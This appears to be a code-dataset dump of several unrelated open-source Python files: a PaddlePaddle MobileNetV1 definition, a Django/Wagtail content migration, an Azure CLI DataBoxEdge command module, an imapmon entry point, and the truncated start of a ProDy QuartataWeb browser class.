ppcls/modeling/architectures/mobilenet_v1.py
|
cq2019git/PaddleClas
| 13
|
6628080
|
<gh_stars>10-100
#copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid as fluid
from paddle.fluid.initializer import MSRA
from paddle.fluid.param_attr import ParamAttr
__all__ = [
'MobileNetV1', 'MobileNetV1_x0_25', 'MobileNetV1_x0_5', 'MobileNetV1_x1_0',
'MobileNetV1_x0_75'
]
class MobileNetV1():
def __init__(self, scale=1.0):
self.scale = scale
def net(self, input, class_dim=1000):
scale = self.scale
# conv1: 112x112
input = self.conv_bn_layer(
input,
filter_size=3,
channels=3,
num_filters=int(32 * scale),
stride=2,
padding=1,
name="conv1")
# 56x56
input = self.depthwise_separable(
input,
num_filters1=32,
num_filters2=64,
num_groups=32,
stride=1,
scale=scale,
name="conv2_1")
input = self.depthwise_separable(
input,
num_filters1=64,
num_filters2=128,
num_groups=64,
stride=2,
scale=scale,
name="conv2_2")
# 28x28
input = self.depthwise_separable(
input,
num_filters1=128,
num_filters2=128,
num_groups=128,
stride=1,
scale=scale,
name="conv3_1")
input = self.depthwise_separable(
input,
num_filters1=128,
num_filters2=256,
num_groups=128,
stride=2,
scale=scale,
name="conv3_2")
# 14x14
input = self.depthwise_separable(
input,
num_filters1=256,
num_filters2=256,
num_groups=256,
stride=1,
scale=scale,
name="conv4_1")
input = self.depthwise_separable(
input,
num_filters1=256,
num_filters2=512,
num_groups=256,
stride=2,
scale=scale,
name="conv4_2")
# 14x14
for i in range(5):
input = self.depthwise_separable(
input,
num_filters1=512,
num_filters2=512,
num_groups=512,
stride=1,
scale=scale,
name="conv5" + "_" + str(i + 1))
# 7x7
input = self.depthwise_separable(
input,
num_filters1=512,
num_filters2=1024,
num_groups=512,
stride=2,
scale=scale,
name="conv5_6")
input = self.depthwise_separable(
input,
num_filters1=1024,
num_filters2=1024,
num_groups=1024,
stride=1,
scale=scale,
name="conv6")
input = fluid.layers.pool2d(
input=input, pool_type='avg', global_pooling=True)
output = fluid.layers.fc(input=input,
size=class_dim,
param_attr=ParamAttr(
initializer=MSRA(), name="fc7_weights"),
bias_attr=ParamAttr(name="fc7_offset"))
return output
def conv_bn_layer(self,
input,
filter_size,
num_filters,
stride,
padding,
channels=None,
num_groups=1,
act='relu',
use_cudnn=True,
name=None):
conv = fluid.layers.conv2d(
input=input,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=padding,
groups=num_groups,
act=None,
use_cudnn=use_cudnn,
param_attr=ParamAttr(
initializer=MSRA(), name=name + "_weights"),
bias_attr=False)
bn_name = name + "_bn"
return fluid.layers.batch_norm(
input=conv,
act=act,
param_attr=ParamAttr(name=bn_name + "_scale"),
bias_attr=ParamAttr(name=bn_name + "_offset"),
moving_mean_name=bn_name + '_mean',
moving_variance_name=bn_name + '_variance')
def depthwise_separable(self,
input,
num_filters1,
num_filters2,
num_groups,
stride,
scale,
name=None):
depthwise_conv = self.conv_bn_layer(
input=input,
filter_size=3,
num_filters=int(num_filters1 * scale),
stride=stride,
padding=1,
num_groups=int(num_groups * scale),
use_cudnn=False,
name=name + "_dw")
pointwise_conv = self.conv_bn_layer(
input=depthwise_conv,
filter_size=1,
num_filters=int(num_filters2 * scale),
stride=1,
padding=0,
name=name + "_sep")
return pointwise_conv
def MobileNetV1_x0_25():
model = MobileNetV1(scale=0.25)
return model
def MobileNetV1_x0_5():
model = MobileNetV1(scale=0.5)
return model
def MobileNetV1_x1_0():
model = MobileNetV1(scale=1.0)
return model
def MobileNetV1_x0_75():
model = MobileNetV1(scale=0.75)
return model
|
#copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid as fluid
from paddle.fluid.initializer import MSRA
from paddle.fluid.param_attr import ParamAttr
__all__ = [
'MobileNetV1', 'MobileNetV1_x0_25', 'MobileNetV1_x0_5', 'MobileNetV1_x1_0',
'MobileNetV1_x0_75'
]
class MobileNetV1():
def __init__(self, scale=1.0):
self.scale = scale
def net(self, input, class_dim=1000):
scale = self.scale
# conv1: 112x112
input = self.conv_bn_layer(
input,
filter_size=3,
channels=3,
num_filters=int(32 * scale),
stride=2,
padding=1,
name="conv1")
# 56x56
input = self.depthwise_separable(
input,
num_filters1=32,
num_filters2=64,
num_groups=32,
stride=1,
scale=scale,
name="conv2_1")
input = self.depthwise_separable(
input,
num_filters1=64,
num_filters2=128,
num_groups=64,
stride=2,
scale=scale,
name="conv2_2")
# 28x28
input = self.depthwise_separable(
input,
num_filters1=128,
num_filters2=128,
num_groups=128,
stride=1,
scale=scale,
name="conv3_1")
input = self.depthwise_separable(
input,
num_filters1=128,
num_filters2=256,
num_groups=128,
stride=2,
scale=scale,
name="conv3_2")
# 14x14
input = self.depthwise_separable(
input,
num_filters1=256,
num_filters2=256,
num_groups=256,
stride=1,
scale=scale,
name="conv4_1")
input = self.depthwise_separable(
input,
num_filters1=256,
num_filters2=512,
num_groups=256,
stride=2,
scale=scale,
name="conv4_2")
# 14x14
for i in range(5):
input = self.depthwise_separable(
input,
num_filters1=512,
num_filters2=512,
num_groups=512,
stride=1,
scale=scale,
name="conv5" + "_" + str(i + 1))
# 7x7
input = self.depthwise_separable(
input,
num_filters1=512,
num_filters2=1024,
num_groups=512,
stride=2,
scale=scale,
name="conv5_6")
input = self.depthwise_separable(
input,
num_filters1=1024,
num_filters2=1024,
num_groups=1024,
stride=1,
scale=scale,
name="conv6")
input = fluid.layers.pool2d(
input=input, pool_type='avg', global_pooling=True)
output = fluid.layers.fc(input=input,
size=class_dim,
param_attr=ParamAttr(
initializer=MSRA(), name="fc7_weights"),
bias_attr=ParamAttr(name="fc7_offset"))
return output
def conv_bn_layer(self,
input,
filter_size,
num_filters,
stride,
padding,
channels=None,
num_groups=1,
act='relu',
use_cudnn=True,
name=None):
conv = fluid.layers.conv2d(
input=input,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=padding,
groups=num_groups,
act=None,
use_cudnn=use_cudnn,
param_attr=ParamAttr(
initializer=MSRA(), name=name + "_weights"),
bias_attr=False)
bn_name = name + "_bn"
return fluid.layers.batch_norm(
input=conv,
act=act,
param_attr=ParamAttr(name=bn_name + "_scale"),
bias_attr=ParamAttr(name=bn_name + "_offset"),
moving_mean_name=bn_name + '_mean',
moving_variance_name=bn_name + '_variance')
def depthwise_separable(self,
input,
num_filters1,
num_filters2,
num_groups,
stride,
scale,
name=None):
depthwise_conv = self.conv_bn_layer(
input=input,
filter_size=3,
num_filters=int(num_filters1 * scale),
stride=stride,
padding=1,
num_groups=int(num_groups * scale),
use_cudnn=False,
name=name + "_dw")
pointwise_conv = self.conv_bn_layer(
input=depthwise_conv,
filter_size=1,
num_filters=int(num_filters2 * scale),
stride=1,
padding=0,
name=name + "_sep")
return pointwise_conv
def MobileNetV1_x0_25():
model = MobileNetV1(scale=0.25)
return model
def MobileNetV1_x0_5():
model = MobileNetV1(scale=0.5)
return model
def MobileNetV1_x1_0():
model = MobileNetV1(scale=1.0)
return model
def MobileNetV1_x0_75():
model = MobileNetV1(scale=0.75)
return model
|
en
| 0.813346
|
#copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. # conv1: 112x112 # 56x56 # 28x28 # 14x14 # 14x14 # 7x7
| 2.100459
| 2
|
cms/migrations/0035_data_migration_for_content_field.py
|
Wassaf-Shahzad/micromasters
| 32
|
6628081
|
# Generated by Django 2.1.2 on 2019-01-15 12:04
import json
from django.core.serializers.json import DjangoJSONEncoder
from django.db import migrations
from wagtail.core.rich_text import RichText
def page_to_streamfield(page):
changed = False
if page.content.raw_text and not page.content:
page.content = [('rich_text', RichText(page.content.raw_text))]
changed = True
return page, changed
def pagerevision_to_streamfield(revision_data):
changed = False
content = revision_data.get('content')
if content:
try:
json.loads(content)
except ValueError:
revision_data['content'] = json.dumps(
[{
"value": content,
"type": "rich_text"
}],
cls=DjangoJSONEncoder)
changed = True
else:
# It's already valid JSON. Leave it.
pass
return revision_data, changed
def page_to_richtext(page):
changed = False
if page.content.raw_text is None:
raw_text = ''.join([
child.value.source for child in page.content
if child.block_type == 'rich_text'
])
page.content = raw_text
changed = True
return page, changed
def pagerevision_to_richtext(revision_data):
changed = False
content = revision_data.get('content', 'definitely non-JSON string')
if content:
try:
content_data = json.loads(content)
except ValueError:
# It's not apparently a StreamField. Leave it.
pass
else:
raw_text = ''.join([
child['value'] for child in content_data
if child['type'] == 'rich_text'
])
revision_data['content'] = raw_text
changed = True
return revision_data, changed
def convert(apps, schema_editor, page_converter, pagerevision_converter):
ProgramTabPage = apps.get_model("cms", "ProgramTabPage")
for page in ProgramTabPage.objects.all():
page, changed = page_converter(page)
if changed:
page.save()
for revision in page.revisions.all():
revision_data = json.loads(revision.content_json)
revision_data, changed = pagerevision_converter(revision_data)
if changed:
revision.content_json = json.dumps(revision_data, cls=DjangoJSONEncoder)
revision.save()
def convert_to_streamfield(apps, schema_editor):
return convert(apps, schema_editor, page_to_streamfield, pagerevision_to_streamfield)
def convert_to_richtext(apps, schema_editor):
return convert(apps, schema_editor, page_to_richtext, pagerevision_to_richtext)
class Migration(migrations.Migration):
dependencies = [
('cms', '0034_alter_content_feild'),
]
operations = [
migrations.RunPython(
convert_to_streamfield,
convert_to_richtext,
),
]
|
# Generated by Django 2.1.2 on 2019-01-15 12:04
import json
from django.core.serializers.json import DjangoJSONEncoder
from django.db import migrations
from wagtail.core.rich_text import RichText
def page_to_streamfield(page):
changed = False
if page.content.raw_text and not page.content:
page.content = [('rich_text', RichText(page.content.raw_text))]
changed = True
return page, changed
def pagerevision_to_streamfield(revision_data):
changed = False
content = revision_data.get('content')
if content:
try:
json.loads(content)
except ValueError:
revision_data['content'] = json.dumps(
[{
"value": content,
"type": "rich_text"
}],
cls=DjangoJSONEncoder)
changed = True
else:
# It's already valid JSON. Leave it.
pass
return revision_data, changed
def page_to_richtext(page):
changed = False
if page.content.raw_text is None:
raw_text = ''.join([
child.value.source for child in page.content
if child.block_type == 'rich_text'
])
page.content = raw_text
changed = True
return page, changed
def pagerevision_to_richtext(revision_data):
changed = False
content = revision_data.get('content', 'definitely non-JSON string')
if content:
try:
content_data = json.loads(content)
except ValueError:
# It's not apparently a StreamField. Leave it.
pass
else:
raw_text = ''.join([
child['value'] for child in content_data
if child['type'] == 'rich_text'
])
revision_data['content'] = raw_text
changed = True
return revision_data, changed
def convert(apps, schema_editor, page_converter, pagerevision_converter):
ProgramTabPage = apps.get_model("cms", "ProgramTabPage")
for page in ProgramTabPage.objects.all():
page, changed = page_converter(page)
if changed:
page.save()
for revision in page.revisions.all():
revision_data = json.loads(revision.content_json)
revision_data, changed = pagerevision_converter(revision_data)
if changed:
revision.content_json = json.dumps(revision_data, cls=DjangoJSONEncoder)
revision.save()
def convert_to_streamfield(apps, schema_editor):
return convert(apps, schema_editor, page_to_streamfield, pagerevision_to_streamfield)
def convert_to_richtext(apps, schema_editor):
return convert(apps, schema_editor, page_to_richtext, pagerevision_to_richtext)
class Migration(migrations.Migration):
dependencies = [
('cms', '0034_alter_content_feild'),
]
operations = [
migrations.RunPython(
convert_to_streamfield,
convert_to_richtext,
),
]
|
en
| 0.939164
|
# Generated by Django 2.1.2 on 2019-01-15 12:04 # It's already valid JSON. Leave it. # It's not apparently a StreamField. Leave it.
| 2.160766
| 2
|
src/azure-cli/azure/cli/command_modules/databoxedge/manual/custom.py
|
YuanyuanNi/azure-cli
| 3,287
|
6628082
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=unused-argument
from azure.cli.core.util import sdk_no_wait
from azure.mgmt.databoxedge.models import Sku
def databoxedge_device_list(client,
resource_group_name=None,
expand=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name,
expand=expand)
return client.list_by_subscription(expand=expand)
def databoxedge_device_show(client,
device_name,
resource_group_name):
return client.get(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_create(client,
device_name,
resource_group_name,
location,
tags=None,
sku=None,
etag=None,
data_box_edge_device_status=None,
description=None,
model_description=None,
friendly_name=None,
no_wait=False):
data_box_edge_device = {}
data_box_edge_device['location'] = location
if tags is not None:
data_box_edge_device['tags'] = tags
if sku is not None:
data_box_edge_device['sku'] = Sku(name=sku)
if etag is not None:
data_box_edge_device['etag'] = etag
if data_box_edge_device is not None:
data_box_edge_device['data_box_edge_device_status'] = data_box_edge_device_status
if description is not None:
data_box_edge_device['description'] = description
if model_description is not None:
data_box_edge_device['model_description'] = model_description
if friendly_name is not None:
data_box_edge_device['friendly_name'] = friendly_name
return sdk_no_wait(no_wait,
client.begin_create_or_update,
device_name=device_name,
resource_group_name=resource_group_name,
data_box_edge_device=data_box_edge_device)
def databoxedge_device_update(client,
device_name,
resource_group_name,
tags=None):
parameters = {}
if tags is not None:
parameters['tags'] = tags
return client.update(device_name=device_name,
resource_group_name=resource_group_name,
parameters=parameters)
def databoxedge_device_delete(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_download_update(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_download_updates,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_install_update(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_install_updates,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_scan_for_update(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_scan_for_updates,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_show_update_summary(client,
device_name,
resource_group_name):
return client.get_update_summary(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_alert_list(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_alert_show(client,
device_name,
name,
resource_group_name):
return client.get(device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_list(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_show(client,
device_name,
name,
resource_group_name):
return client.get(device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_create(client,
device_name,
name,
resource_group_name,
start,
stop,
rate_in_mbps,
days,
no_wait=False):
parameters = {}
parameters['start'] = start
parameters['stop'] = stop
parameters['rate_in_mbps'] = rate_in_mbps
parameters['days'] = days
return sdk_no_wait(no_wait,
client.begin_create_or_update,
device_name=device_name,
name=name,
resource_group_name=resource_group_name,
parameters=parameters)
def databoxedge_bandwidth_schedule_update(instance,
device_name,
name,
resource_group_name,
start,
stop,
rate_in_mbps,
days,
no_wait=False):
if start is not None:
instance.start = start
if stop is not None:
instance.stop = stop
if rate_in_mbps is not None:
instance.rate_in_mbps = rate_in_mbps
if days is not None:
instance.days = days
return instance
def databoxedge_bandwidth_schedule_delete(client,
device_name,
name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_show_job(client,
device_name,
name,
resource_group_name):
return client.get(device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_list_node(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_order_list(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_order_show(client,
device_name,
resource_group_name):
return client.get(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_order_create(client,
device_name,
resource_group_name,
address_line1,
postal_code,
city,
state,
country,
contact_person,
company_name,
phone,
email_list,
status,
comments=None,
address_line2=None,
address_line3=None,
no_wait=False):
order = {}
order['current_status'] = {}
order['current_status']['status'] = status
if comments is not None:
order['current_status']['comments'] = comments
order['shipping_address'] = {}
order['shipping_address']['address_line1'] = address_line1
if address_line2 is not None:
order['shipping_address']['address_line2'] = address_line2
if address_line3 is not None:
order['shipping_address']['address_line3'] = address_line3
order['shipping_address']['postal_code'] = postal_code
order['shipping_address']['city'] = city
order['shipping_address']['state'] = state
order['shipping_address']['country'] = country
order['contact_information'] = {}
order['contact_information']['contact_person'] = contact_person
order['contact_information']['company_name'] = company_name
order['contact_information']['phone'] = phone
order['contact_information']['email_list'] = email_list
return sdk_no_wait(no_wait,
client.begin_create_or_update,
device_name=device_name,
resource_group_name=resource_group_name,
order=order)
def databoxedge_order_update(instance,
device_name,
resource_group_name,
status=None,
comments=None,
address_line1=None,
address_line2=None,
address_line3=None,
postal_code=None,
city=None,
state=None,
country=None,
contact_person=None,
company_name=None,
phone=None,
email_list=None,
no_wait=False):
if status is not None:
instance.current_status.status = status
if comments is not None:
instance.current_status.comments = comments
if address_line1 is not None:
instance.shipping_address.address_line1 = address_line1
if address_line2 is not None:
instance.shipping_address.address_line2 = address_line2
if address_line3 is not None:
instance.shipping_address.address_line3 = address_line3
if postal_code is not None:
instance.shipping_address.postal_code = postal_code
if city is not None:
instance.shipping_address.city = city
if state is not None:
instance.shipping_address.state = state
if country is not None:
instance.shipping_address.country = country
if contact_person is not None:
instance.contact_information.contact_person = contact_person
if company_name is not None:
instance.contact_information.company_name = company_name
if phone is not None:
instance.contact_information.phone = phone
if email_list is not None:
instance.contact_information.email_list = email_list
return instance
def databoxedge_order_delete(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_list_sku(client,
filter_=None):
return client.list(filter=filter_)
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=unused-argument
from azure.cli.core.util import sdk_no_wait
from azure.mgmt.databoxedge.models import Sku
def databoxedge_device_list(client,
resource_group_name=None,
expand=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name,
expand=expand)
return client.list_by_subscription(expand=expand)
def databoxedge_device_show(client,
device_name,
resource_group_name):
return client.get(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_create(client,
device_name,
resource_group_name,
location,
tags=None,
sku=None,
etag=None,
data_box_edge_device_status=None,
description=None,
model_description=None,
friendly_name=None,
no_wait=False):
data_box_edge_device = {}
data_box_edge_device['location'] = location
if tags is not None:
data_box_edge_device['tags'] = tags
if sku is not None:
data_box_edge_device['sku'] = Sku(name=sku)
if etag is not None:
data_box_edge_device['etag'] = etag
if data_box_edge_device is not None:
data_box_edge_device['data_box_edge_device_status'] = data_box_edge_device_status
if description is not None:
data_box_edge_device['description'] = description
if model_description is not None:
data_box_edge_device['model_description'] = model_description
if friendly_name is not None:
data_box_edge_device['friendly_name'] = friendly_name
return sdk_no_wait(no_wait,
client.begin_create_or_update,
device_name=device_name,
resource_group_name=resource_group_name,
data_box_edge_device=data_box_edge_device)
def databoxedge_device_update(client,
device_name,
resource_group_name,
tags=None):
parameters = {}
if tags is not None:
parameters['tags'] = tags
return client.update(device_name=device_name,
resource_group_name=resource_group_name,
parameters=parameters)
def databoxedge_device_delete(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_download_update(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_download_updates,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_install_update(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_install_updates,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_scan_for_update(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_scan_for_updates,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_show_update_summary(client,
device_name,
resource_group_name):
return client.get_update_summary(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_alert_list(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_alert_show(client,
device_name,
name,
resource_group_name):
return client.get(device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_list(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_show(client,
device_name,
name,
resource_group_name):
return client.get(device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_create(client,
device_name,
name,
resource_group_name,
start,
stop,
rate_in_mbps,
days,
no_wait=False):
parameters = {}
parameters['start'] = start
parameters['stop'] = stop
parameters['rate_in_mbps'] = rate_in_mbps
parameters['days'] = days
return sdk_no_wait(no_wait,
client.begin_create_or_update,
device_name=device_name,
name=name,
resource_group_name=resource_group_name,
parameters=parameters)
def databoxedge_bandwidth_schedule_update(instance,
device_name,
name,
resource_group_name,
start,
stop,
rate_in_mbps,
days,
no_wait=False):
if start is not None:
instance.start = start
if stop is not None:
instance.stop = stop
if rate_in_mbps is not None:
instance.rate_in_mbps = rate_in_mbps
if days is not None:
instance.days = days
return instance
def databoxedge_bandwidth_schedule_delete(client,
device_name,
name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_show_job(client,
device_name,
name,
resource_group_name):
return client.get(device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_list_node(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_order_list(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_order_show(client,
device_name,
resource_group_name):
return client.get(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_order_create(client,
device_name,
resource_group_name,
address_line1,
postal_code,
city,
state,
country,
contact_person,
company_name,
phone,
email_list,
status,
comments=None,
address_line2=None,
address_line3=None,
no_wait=False):
order = {}
order['current_status'] = {}
order['current_status']['status'] = status
if comments is not None:
order['current_status']['comments'] = comments
order['shipping_address'] = {}
order['shipping_address']['address_line1'] = address_line1
if address_line2 is not None:
order['shipping_address']['address_line2'] = address_line2
if address_line3 is not None:
order['shipping_address']['address_line3'] = address_line3
order['shipping_address']['postal_code'] = postal_code
order['shipping_address']['city'] = city
order['shipping_address']['state'] = state
order['shipping_address']['country'] = country
order['contact_information'] = {}
order['contact_information']['contact_person'] = contact_person
order['contact_information']['company_name'] = company_name
order['contact_information']['phone'] = phone
order['contact_information']['email_list'] = email_list
return sdk_no_wait(no_wait,
client.begin_create_or_update,
device_name=device_name,
resource_group_name=resource_group_name,
order=order)
def databoxedge_order_update(instance,
device_name,
resource_group_name,
status=None,
comments=None,
address_line1=None,
address_line2=None,
address_line3=None,
postal_code=None,
city=None,
state=None,
country=None,
contact_person=None,
company_name=None,
phone=None,
email_list=None,
no_wait=False):
if status is not None:
instance.current_status.status = status
if comments is not None:
instance.current_status.comments = comments
if address_line1 is not None:
instance.shipping_address.address_line1 = address_line1
if address_line2 is not None:
instance.shipping_address.address_line2 = address_line2
if address_line3 is not None:
instance.shipping_address.address_line3 = address_line3
if postal_code is not None:
instance.shipping_address.postal_code = postal_code
if city is not None:
instance.shipping_address.city = city
if state is not None:
instance.shipping_address.state = state
if country is not None:
instance.shipping_address.country = country
if contact_person is not None:
instance.contact_information.contact_person = contact_person
if company_name is not None:
instance.contact_information.company_name = company_name
if phone is not None:
instance.contact_information.phone = phone
if email_list is not None:
instance.contact_information.email_list = email_list
return instance
def databoxedge_order_delete(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_list_sku(client,
filter_=None):
return client.list(filter=filter_)
|
en
| 0.553276
|
# -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- # pylint: disable=too-many-lines # pylint: disable=unused-argument
| 1.905617
| 2
|
imapmon/__main__.py
|
soar/imapmon
| 0
|
6628083
|
from .scripts import run
def main():
return run(auto_envvar_prefix='IMAPMON') # pylint: disable=no-value-for-parameter
if __name__ == '__main__':
main()
|
from .scripts import run
def main():
return run(auto_envvar_prefix='IMAPMON') # pylint: disable=no-value-for-parameter
if __name__ == '__main__':
main()
|
en
| 0.278494
|
# pylint: disable=no-value-for-parameter
| 1.254132
| 1
|
prody/database/quartataweb.py
|
bwingert/ProDy
| 0
|
6628084
|
# -*- coding: utf-8 -*-
"""This module defines classes and functions for browsing QuartataWeb.
----------------------------------------------------------------------------------------
Based on code written by the CHARMM-GUI team (http://charmm-gui.org) and modified by <NAME>
This suite uses the following softwares:
a) python Splinter package (https://splinter.readthedocs.org/en/latest/)
b) a web browser, such as Google Chrome or Mozilla Firefox
c) the corresponding driver such as chromedriver (https://sites.google.com/a/chromium.org/chromedriver/downloads)
for Chrome or geckodriver (https://github.com/mozilla/geckodriver/releases) for Firefox
----------------------------------------------------------------------------------------
"""
from prody import PY3K, LOGGER
import numpy as np
__all__ = ['QuartataWebBrowser', 'QuartataChemicalRecord', 'searchQuartataWeb']
class QuartataWebBrowser(object):
"""Class to browse the QuartataWeb website."""
def __init__(self, data_source=None, drug_group=None, input_type=None, query_type=None,
data=None, num_predictions=None, browser_type=None, job_id=None):
"""Instantiate a QuartataWebBrowser object instance.
:arg data_source: source database for QuartataWeb analysis
options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"``
:type data_source: str
:arg drug_group: group of drugs if using DrugBank
options are ``"Approved"`` or ``"All"``. Default is ``"All"``
:type drug_group: str
:arg input_type: number corresponding to the input type, options are
``1`` (Chemical and/or target) or
``2`` (A list of chemicals, targets or chemical combinations).
Default is ``1``
:type input_type: int
:arg query_type: number corresponding to the query type. Options are
dependent on input_type.
With input_type 1, they are:
* ``1`` (chemical-target interaction)
* ``2`` (chemical-chemical similarity)
* ``3`` (target-target similarity)
With input_type 2, they are:
* ``1`` (chemicals)
* ``2`` (targets)
* ``3`` (chemical combinations)
Default is ``1``
:type query_type: int
:arg data: data to enter into the box or boxes. This varies depending on input type
and query type, but will always be a list of strings.
For input_type 1, a list with two items is expected. These will be one of the
following depending on query_type:
* With query_type 1, the first would be a chemical and the second a target.
One of these can also be left blank.
* With query_type 2, the first would be a chemical and the second a chemical.
* With query_type 3, the first would be a target and the second a target.
For input_type 2, a list with any length is expected. These will be one of the
following depending on query_type:
* With query_type 1, these would be chemicals.
* With query_type 2, these would be targets.
* With query_type 3, these would be pairs of chemicals, separated by semicolons.
:type data: list
:arg num_predictions: number of predictions to show or consider in addition to
known interactions. Default is ``0``.
With DrugBank and input_type 1, a second number can be provided in a list
for secondary interactions.
:type num_predictions: int, list
:arg browser_type: browser type for navigation
Default is ``"Chrome"``
:type browser_type: str
:arg job_id: job ID for accessing previous jobs
Default is ``None``
:type browser_type: int
"""
self.browser_type = None
self.browser = None
self.data_source = None
self.drug_group = None
self.input_type = None
self.query_type = None
self.data = None
self.num_predictions = None
self.job_id = job_id
self.setBrowserType(browser_type)
self.setDataSource(data_source)
self.setDrugGroup(drug_group)
self.setInputType(input_type)
self.setQueryType(query_type)
self.setData(data)
self.setNumPredictions(num_predictions)
def updateHomePage(self):
"""Update the home page with data from setting variables"""
url = "http://quartata.csb.pitt.edu"
if self.data_source == 'DrugBank':
url += '/index'
else:
url += '/index_stitch'
if self.input_type == 2:
url += '_2'
url += '.php'
self.browser.visit(url)
if self.data_source == 'DrugBank':
if self.drug_group == 'Approved':
self.browser.find_by_name('db_type')[0].click()
else:
